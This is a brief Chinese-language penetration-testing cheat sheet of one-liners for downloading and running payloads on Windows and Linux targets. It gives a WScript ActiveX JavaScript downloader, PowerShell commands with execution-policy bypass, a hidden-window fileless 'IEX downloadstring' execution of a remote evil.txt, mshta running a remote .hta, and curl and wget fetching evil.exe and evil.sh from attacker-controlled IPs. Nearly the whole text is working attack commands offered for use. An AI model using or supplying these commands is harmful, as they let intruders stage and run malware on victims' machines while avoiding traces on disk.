js一句话下载payload
windows 全版本都会默认支持 js,并且通过cscript 来调用达到下载 payload 的目的。
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream"); BinStream.Type = 1;
BinStream.Open(); BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile("micropoor.exe");
C:\test>cscript /nologo dowfile2.js http://192.168.1.1/eval.exe
还有最简单的powershell
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://192.168.1.115/robots.txt','E:\robots.txt')
远程执行命令,且无文件落地:
powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.174.1:1234/evil.txt'))"
远程目标主机上执行以下命令实现下载执行操作,且无文件落地:
mshta http://192.168.174.1:1234/evil.hta
curl
curl http://192.168.174.1:1234/evil.exe -o evil.exe
wget
wget http://192.168.174.1:1234/evil.sh